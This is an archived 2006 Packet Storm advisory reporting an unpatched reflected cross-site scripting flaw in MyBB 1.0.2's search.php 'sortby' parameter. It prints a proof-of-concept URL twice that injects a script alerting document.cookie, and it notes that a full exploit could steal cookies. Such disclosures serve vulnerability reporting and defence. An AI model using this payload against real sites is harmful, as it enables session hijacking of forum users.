MyBB-search.txt

2006-01-27T00:00:00
ID PACKETSTORM:43430
Type packetstorm
Reporter imei addmimistrator
Modified 2006-01-27T00:00:00

Description

                                        
                                            `http://127.0.0.1/mybb/search.php?action=do_search&keywords=&postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby="><script language=javascript>alert(document.cookie)</script>&sorder=1&showresults=threads&submit=Search  
--------------------Summary----------------  
  
Software: MyBB  
Sowtware's Web Site: http://www.mybboard.com  
Versions: 1.0.2 updated  
Class: Remote  
Status: Unpatched  
Exploit: Available  
Solution: Not Available  
Discovered by: imei  
Risk Level:low  
-----------------Description---------------  
Mybb has a security bug that allows hackers run unwanted scripts into client's browser that well known as XSS cross site scripting   
bug is in result of poor cheknig of two input varibles "sortby" & "sortordr" in redirection page of search pages.  
line668of search.php  
a full exploit can result to thefting cookies...  
bug founded by imei and reported to vendor...  
--------------Exploit----------------------  
go to this url:  
/mybb/search.php?action=do_search&keywords=&postthread=1&author=imei&matchusername=1&forums=all&findthreadst=1&numreplies=&postdate=0&pddir=1&sortby="><script language=javascript>alert(document.cookie)</script>&sorder=1&showresults=threads&submit=Search  
--------------Solution---------------------  
No Patch available.  
--------------Credit-----------------------  
Discovered by: imei addmimistrator[at]gmail[dot]com  
`